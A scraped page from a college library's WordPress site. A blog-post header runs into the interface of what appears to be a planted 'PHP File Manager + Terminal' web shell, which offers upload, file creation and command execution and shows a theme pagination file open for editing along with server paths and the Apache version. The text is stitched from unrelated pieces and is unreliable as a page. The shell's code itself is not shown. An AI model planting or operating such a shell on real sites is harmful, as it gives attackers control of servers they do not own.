Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/library/wp-content/themes/coldbox/parts Upload Create File Create Folder Execute Editing: /var/www/html/library/wp-content/themes/coldbox/parts/page-nav.php<?php /** * The template for displaying paginate links * * @since 1.0.0 * @package Coldbox */ global $wp_query; the_posts_pagination( array( 'type' => 'list', 'end_size' => '2', 'mid_size' => '3', 'total' => $wp_query->max_num_pages, 'prev_text' => '«', 'next_text' => '»', 'after_page_number' => '', ) ); Save